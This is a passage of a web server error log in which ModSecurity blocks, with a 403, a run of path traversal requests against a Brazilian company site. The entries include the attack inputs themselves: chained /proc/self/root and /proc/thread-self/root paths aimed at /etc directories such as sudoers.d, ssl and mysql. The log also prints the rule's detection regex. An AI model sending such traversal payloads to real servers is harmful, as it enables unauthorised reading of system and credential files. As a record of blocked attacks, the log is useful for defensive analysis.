"bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo-uyqAr6etmhZHNoyAAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:50.279275 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.243.128:49794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo-hkFeYa1D6dYQnC8dgAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:42:51.487111 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:48820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo-wkwaGbbGflqUZCDJgAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:51.563181 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.243.128:49808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo-1_V7PWP6ixUYl6KmgAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:42:52.895968 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.241.31:48836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo_P-YZRR_7pZ7nDJbvAAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:52.965067 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:49814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo_Na6ubjKNq_cu4YPuAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:42:54.313441 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:49826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo_vu8EFLIOrSqIptr1AAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:42:55.709323 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:49838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo_9a6ubjKNq_cu4YPvgAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:42:56.282725 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:48846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupANa6ubjKNq_cu4YPwAAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:57.059465 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:49842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupAeyqAr6etmhZHNoyCAAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:42:57.635631 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:33082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupAfu8EFLIOrSqIptr2AAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:59.407398 2026] [:error] [pid 19093:tid 140411557287680] [client 74.7.243.128:49848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupA1_V7PWP6ixUYl6KngAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:00.758478 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:57400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupBOoXxyEfFpUF8f_e3QAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:01.101461 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:33086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupBfu8EFLIOrSqIptr4gAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:06.813436 2026] [:error] [pid 19093:tid 140411641214720] [client 74.7.243.128:57406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupCl_V7PWP6ixUYl6KrwAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:07.344213 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.241.31:33100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupCwbLMZ6AikZjR9Ur8gAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:08.196561 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:57410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupDNa6ubjKNq_cu4YPxAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:09.503387 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:43428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupDda6ubjKNq_cu4YPxgAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:10.926111 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:43434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupDta6ubjKNq_cu4YPyQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:12.253481 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:43436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupEAkwaGbbGflqUZCDNgAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:13.598310 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.243.128:43450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupEQbLMZ6AikZjR9Ur-wAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:14.919990 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:43464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupEuyqAr6etmhZHNoyCgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
